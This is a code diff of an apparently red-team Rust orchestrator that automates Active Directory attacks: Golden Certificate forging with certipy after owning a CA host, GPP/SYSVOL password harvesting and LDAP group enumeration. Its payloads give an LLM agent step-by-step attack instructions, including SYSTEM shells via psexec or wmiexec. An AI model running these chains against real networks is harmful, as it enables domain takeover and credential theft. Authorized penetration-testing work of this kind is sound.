+ let contoso_work = work.iter().find(|w| w.domain == "contoso.local").unwrap();
+ assert_eq!(contoso_work.credential.username, "gooduser");
+ }
+
+ #[test]
+ fn collect_skips_empty_password() {
+ let mut state = StateInner::new("test-op".into());
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_foreign_group_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_foreign_group_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/golden_cert.rs b/ares-cli/src/orchestrator/automation/golden_cert.rs
new file mode 100644
index 00000000..c643cf49
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/golden_cert.rs
@@ -0,0 +1,525 @@
+//! auto_golden_cert -- forge a Golden Certificate after owning an ADCS CA host.
+//!
+//! When a CA host is fully owned (local SYSTEM via lateral movement) and the
+//! CA's domain is not yet dominated, drive the offline Golden Certificate
+//! pipeline:
+//!
+//! 1. **Backup**: `certipy ca -backup` extracts the CA private key + cert
+//! to a PFX (requires SYSTEM/local admin or CA admin rights — owning the
+//! CA host satisfies this).
+//! 2. **Forge**: `certipy forge -ca-pfx -upn administrator@`
+//! produces a client-auth certificate signed by the CA, for any UPN.
+//! No DC interaction is needed — purely offline.
+//! 3. **Auth**: `certipy auth -pfx forged.pfx -dc-ip ` performs PKINIT
+//! to obtain the target user's NT hash.
+//!
+//! This is the universal terminal for cross-forest compromise: every ADCS-
+//! adjacent attack path (ESC1/ESC4/ESC8, MSSQL→xp_cmdshell→host, RBCD →
+//! S4U → SYSTEM, shadow creds → admin → host) converges here once the CA
+//! host is owned, regardless of which forest the CA lives in.
+//!
+//! Cross-forest note: the CA's *own* domain credential is what we need for
+//! the `certipy ca -backup` RPC call. We pull it via `find_source_credential`
+//! / `find_trust_credential` so a cred from the originating forest works
+//! when there is no same-domain cred yet.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Watches for owned CA hosts and dispatches Golden Certificate pipelines.
+/// Interval: 30s.
+pub async fn auto_golden_cert(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("golden_cert") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_golden_cert_work(&state)
+ };
+
+ for item in work {
+ let mut payload = json!({
+ "technique": "golden_cert",
+ "ca_host": item.ca_host,
+ "ca_hostname": item.ca_hostname,
+ "domain": item.domain,
+ "target_user": "administrator",
+ "target_upn": format!("administrator@{}", item.domain),
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "objectives": [
+ "Step 1 (backup): run `certipy_ca` with backup=true, ca=, username/password from credential, dc_ip=. Requires SYSTEM or CA admin on the CA host — since this host is owned, you can also run a SYSTEM shell (psexec/wmiexec) and execute certipy locally.",
+ "Step 2 (forge): run `certipy_forge` with ca_pfx=, upn=`administrator@`. Output is a forged client-auth certificate signed by the CA private key — no DC interaction needed.",
+ "Step 3 (auth): run `certipy_auth` with pfx_path=, domain=, dc_ip= to PKINIT-authenticate as administrator and recover the NT hash.",
+ "If you don't yet know the CA name, run `certipy_find` first against this host to discover it (the CA's `Name` / `DNS Name`).",
+ "If `certipy_ca -backup` fails with an RPC/perm error from a network cred, fall back to a local SYSTEM shell (psexec/wmiexec to ca_host) and run certipy from there — the host is owned.",
+ ],
+ });
+
+ if let Some(ref dc) = item.dc_ip {
+ payload["dc_ip"] = json!(dc);
+ payload["target_ip"] = json!(dc);
+ }
+ if let Some(ref ca_name) = item.ca_name {
+ payload["ca_name"] = json!(ca_name);
+ }
+ if let Some(ref sid) = item.domain_sid {
+ payload["domain_sid"] = json!(sid);
+ payload["admin_sid"] = json!(format!("{sid}-500"));
+ }
+
+ let priority = dispatcher.effective_priority("golden_cert");
+ match dispatcher
+ .throttled_submit("exploit", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ ca_host = %item.ca_host,
+ domain = %item.domain,
+ "Golden Certificate pipeline dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_GOLDEN_CERT, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_GOLDEN_CERT, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(ca_host = %item.ca_host, "Golden Cert deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, ca_host = %item.ca_host, "Failed to dispatch Golden Cert");
+ }
+ }
+ }
+ }
+}
+
+/// Pure logic so it can be unit-tested without a `Dispatcher` or runtime.
+fn collect_golden_cert_work(state: &StateInner) -> Vec {
+ state
+ .hosts
+ .iter()
+ .filter(|h| h.owned)
+ .filter_map(|h| {
+ let host_lower = h.ip.to_lowercase();
+ let hostname_lower = h.hostname.to_lowercase();
+
+ let is_ca = state.shares.iter().any(|s| {
+ s.name.to_lowercase() == "certenroll"
+ && (s.host == h.ip || s.host.to_lowercase() == hostname_lower)
+ });
+ if !is_ca {
+ return None;
+ }
+
+ let domain = extract_domain_from_fqdn(&h.hostname).and_then(|d| {
+ if state.domains.iter().any(|known| known.to_lowercase() == d) {
+ Some(d)
+ } else {
+ state
+ .domains
+ .iter()
+ .find(|known| d.ends_with(&format!(".{}", known.to_lowercase())))
+ .or_else(|| {
+ state
+ .domains
+ .iter()
+ .find(|known| known.to_lowercase().ends_with(&format!(".{d}")))
+ })
+ .cloned()
+ .or(Some(d))
+ }
+ })?;
+
+ // Don't forge a Golden Cert against a domain we already own.
+ if state.dominated_domains.contains(&domain) {
+ return None;
+ }
+
+ let dedup_key = format!("{}:{}", host_lower, domain.to_lowercase());
+ if state.is_processed(DEDUP_GOLDEN_CERT, &dedup_key) {
+ return None;
+ }
+
+ // The certipy_ca call needs a credential that authenticates to the
+ // CA host's domain. Try same-domain first, then trusted-domain
+ // (cross-forest) as fallback.
+ let same_domain = state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.username.starts_with('$')
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned();
+
+ let credential = same_domain.or_else(|| state.find_trust_credential(&domain))?;
+
+ let dc_ip = state
+ .domain_controllers
+ .get(&domain.to_lowercase())
+ .cloned();
+
+ let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned();
+
+ let ca_name = lookup_ca_name(state, &h.ip, &h.hostname);
+
+ Some(GoldenCertWork {
+ ca_host: h.ip.clone(),
+ ca_hostname: h.hostname.clone(),
+ dedup_key,
+ domain,
+ dc_ip,
+ domain_sid,
+ ca_name,
+ credential,
+ })
+ })
+ .collect()
+}
+
+/// Extract the domain portion of an FQDN ("ca01.contoso.local" -> "contoso.local").
+fn extract_domain_from_fqdn(fqdn: &str) -> Option {
+ fqdn.to_lowercase()
+ .split_once('.')
+ .map(|(_, d)| d.to_string())
+}
+
+/// Look up a CA name from previously-discovered ADCS vulns on this host.
+/// Falls back to None if no `certipy_find` result has populated `ca_name` yet —
+/// the LLM agent is instructed to run certipy_find first when this is missing.
+fn lookup_ca_name(state: &StateInner, host_ip: &str, hostname: &str) -> Option {
+ let host_l = host_ip.to_lowercase();
+ let hn_l = hostname.to_lowercase();
+ state
+ .discovered_vulnerabilities
+ .values()
+ .filter(|v| {
+ let t = v.target.to_lowercase();
+ t == host_l || t == hn_l
+ })
+ .find_map(|v| {
+ for key in &["ca_name", "CA", "ca"] {
+ if let Some(s) = v.details.get(*key).and_then(|x| x.as_str()) {
+ if !s.is_empty() {
+ return Some(s.to_string());
+ }
+ }
+ }
+ None
+ })
+}
+
+struct GoldenCertWork {
+ ca_host: String,
+ ca_hostname: String,
+ dedup_key: String,
+ domain: String,
+ dc_ip: Option,
+ domain_sid: Option,
+ ca_name: Option,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Credential, Host, Share};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, owned: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned,
+ }
+ }
+
+ fn make_share(host: &str, name: &str) -> Share {
+ Share {
+ host: host.into(),
+ name: name.into(),
+ permissions: String::new(),
+ comment: String::new(),
+ }
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_GOLDEN_CERT, "golden_cert");
+ }
+
+ #[test]
+ fn extract_domain_typical() {
+ assert_eq!(
+ extract_domain_from_fqdn("ca01.contoso.local"),
+ Some("contoso.local".to_string())
+ );
+ }
+
+ #[test]
+ fn extract_domain_case_insensitive() {
+ assert_eq!(
+ extract_domain_from_fqdn("CA01.CONTOSO.LOCAL"),
+ Some("contoso.local".to_string())
+ );
+ }
+
+ #[test]
+ fn extract_domain_bare_hostname() {
+ assert_eq!(extract_domain_from_fqdn("ca01"), None);
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_unowned_ca_host_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", false));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty(), "unowned CA host should not yield work");
+ }
+
+ #[test]
+ fn collect_owned_non_ca_host_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ // Owned host but no CertEnroll share
+ state
+ .hosts
+ .push(make_host("192.168.58.20", "fs01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty(), "non-CA owned host should not yield work");
+ }
+
+ #[test]
+ fn collect_owned_ca_with_same_domain_cred_yields_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].ca_host, "192.168.58.50");
+ assert_eq!(work[0].ca_hostname, "ca01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local");
+ }
+
+ #[test]
+ fn collect_dominated_domain_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state.dominated_domains.insert("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert!(
+ work.is_empty(),
+ "should not forge against an already-dominated domain"
+ );
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_GOLDEN_CERT, "192.168.58.50:contoso.local".into());
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credential_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ // No credentials at all
+ let work = collect_golden_cert_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_resolves_dc_ip_when_available() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip.as_deref(), Some("192.168.58.10"));
+ }
+
+ #[test]
+ fn collect_certenroll_case_insensitive() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "certenroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_picks_domain_sid_when_known() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .domain_sids
+ .insert("contoso.local".into(), "S-1-5-21-1111-2222-3333".into());
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(
+ work[0].domain_sid.as_deref(),
+ Some("S-1-5-21-1111-2222-3333")
+ );
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "CA01.CONTOSO.LOCAL", true));
+ state.domains.push("contoso.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 1);
+ // Dedup key uses lowercase IP (already lowercase here) and lowercase domain
+ assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local");
+ }
+
+ #[test]
+ fn collect_multiple_owned_cas_yields_multiple_work() {
+ let mut state = StateInner::new("test-op".into());
+ state.shares.push(make_share("192.168.58.50", "CertEnroll"));
+ state.shares.push(make_share("192.168.58.51", "CertEnroll"));
+ state
+ .hosts
+ .push(make_host("192.168.58.50", "ca01.contoso.local", true));
+ state
+ .hosts
+ .push(make_host("192.168.58.51", "ca02.fabrikam.local", true));
+ state.domains.push("contoso.local".into());
+ state.domains.push("fabrikam.local".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fabadmin", "Fab!Pass", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_golden_cert_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/golden_ticket.rs b/ares-cli/src/orchestrator/automation/golden_ticket.rs
index d58b7372..3127cb0c 100644
--- a/ares-cli/src/orchestrator/automation/golden_ticket.rs
+++ b/ares-cli/src/orchestrator/automation/golden_ticket.rs
@@ -229,7 +229,7 @@ pub async fn auto_golden_ticket(dispatcher: Arc, mut shutdown: watch
/// Uses the credential's own domain for NTLM auth (not the target domain) so
/// cross-domain trust authentication works — e.g. a `child.contoso.local`
/// cred can resolve the SID of `contoso.local` via its parent DC.
-async fn resolve_domain_sid(
+pub(crate) async fn resolve_domain_sid(
_domain: &str,
dc_ip: &str,
password_cred: Option<&ares_core::models::Credential>,
diff --git a/ares-cli/src/orchestrator/automation/gpp_sysvol.rs b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs
new file mode 100644
index 00000000..a2d6d049
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/gpp_sysvol.rs
@@ -0,0 +1,342 @@
+//! auto_gpp_sysvol -- search for GPP passwords and credential artifacts in SYSVOL.
+//!
+//! Group Policy Preferences (GPP) XML files can contain encrypted passwords
+//! using a publicly known AES key (MS14-025). SYSVOL scripts (.bat, .ps1, .vbs)
+//! often contain hardcoded credentials.
+//!
+//! Dispatches two techniques per DC:
+//! 1. `gpp_password_finder` — searches SYSVOL for Groups.xml, Scheduledtasks.xml, etc.
+//! 2. `sysvol_script_search` — greps SYSVOL scripts for passwords/credentials
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect GPP/SYSVOL work items from state (pure logic, no async).
+fn collect_gpp_sysvol_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("gpp:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_GPP_SYSVOL, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(GppSysvolWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Searches SYSVOL for GPP passwords and script credentials.
+/// Interval: 45s.
+pub async fn auto_gpp_sysvol(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("gpp_sysvol") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_gpp_sysvol_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "techniques": ["gpp_password_finder", "sysvol_script_search"],
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("gpp_sysvol");
+ match dispatcher
+ .throttled_submit("credential_access", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "GPP/SYSVOL credential search dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_GPP_SYSVOL, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_GPP_SYSVOL, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "GPP/SYSVOL task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch GPP/SYSVOL search");
+ }
+ }
+ }
+ }
+}
+
+struct GppSysvolWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("gpp:{}", "contoso.local");
+ assert_eq!(key, "gpp:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_GPP_SYSVOL, "gpp_sysvol");
+ }
+
+ #[test]
+ fn payload_contains_both_techniques() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "techniques": ["gpp_password_finder", "sysvol_script_search"],
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ let techniques = payload["techniques"].as_array().unwrap();
+ assert_eq!(techniques.len(), 2);
+ assert_eq!(techniques[0], "gpp_password_finder");
+ assert_eq!(techniques[1], "sysvol_script_search");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = GppSysvolWork {
+ dedup_key: "gpp:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dedup_key, "gpp:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("gpp:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "gpp:contoso.local");
+ }
+
+ #[test]
+ fn two_tasks_per_domain() {
+ // The payload dispatches two techniques in a single submission per domain
+ let techniques = ["gpp_password_finder", "sysvol_script_search"];
+ assert_eq!(techniques.len(), 2);
+ }
+
+ // --- collect_gpp_sysvol_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_gpp_sysvol_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_gpp_sysvol_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dc_with_matching_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "gpp:contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_already_processed_dedup() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_GPP_SYSVOL, "gpp:contoso.local".into());
+ let work = collect_gpp_sysvol_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_multiple_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fabadmin", "fabrikam.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ state
+ .credentials
+ .push(make_cred("conuser", "contoso.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "conuser");
+ }
+
+ #[test]
+ fn collect_case_insensitive_domain_match() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_gpp_sysvol_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "gpp:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("gpp:{}", "contoso.local");
+ let key2 = format!("gpp:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/group_enumeration.rs b/ares-cli/src/orchestrator/automation/group_enumeration.rs
new file mode 100644
index 00000000..43723890
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/group_enumeration.rs
@@ -0,0 +1,615 @@
+//! auto_group_enumeration -- enumerate domain groups and memberships via LDAP.
+//!
+//! Dispatches per-domain LDAP group enumeration to discover security groups,
+//! their members, and cross-domain memberships. This covers a large gap in
+//! attack surface mapping — group membership determines ACL attack paths,
+//! privilege escalation chains, and cross-domain lateral movement.
+//!
+//! The recon agent queries `(objectCategory=group)` and resolves membership
+//! recursively, including Foreign Security Principals for cross-domain groups.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect group enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_group_enumeration` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_group_enum_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() && state.hashes.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ let all_dcs = state.all_domains_with_dcs();
+ if all_dcs.is_empty() {
+ return Vec::new();
+ }
+ debug!(
+ domains = ?all_dcs.iter().map(|(d,_)| d.as_str()).collect::>(),
+ trusted = ?state.trusted_domains.keys().collect::>(),
+ creds = state.credentials.len(),
+ hashes = state.hashes.len(),
+ "Group enum state check"
+ );
+ for (domain, dc_ip) in &all_dcs {
+ // Use separate dedup keys for cred vs hash attempts so a failed
+ // password-based attempt (e.g., mislabeled credential domain)
+ // doesn't permanently block the hash-based path.
+ let dedup_key_cred = format!("group_enum:{}:cred", domain.to_lowercase());
+ let dedup_key_hash = format!("group_enum:{}:hash", domain.to_lowercase());
+ let dedup_key_trust = format!("group_enum:{}:trust", domain.to_lowercase());
+
+ // Prefer same-domain cleartext cred, then fall back to trust-compatible
+ // cred (child→parent or cross-forest). Trust-based attempts use a
+ // separate dedup key so they don't block hash-based fallback.
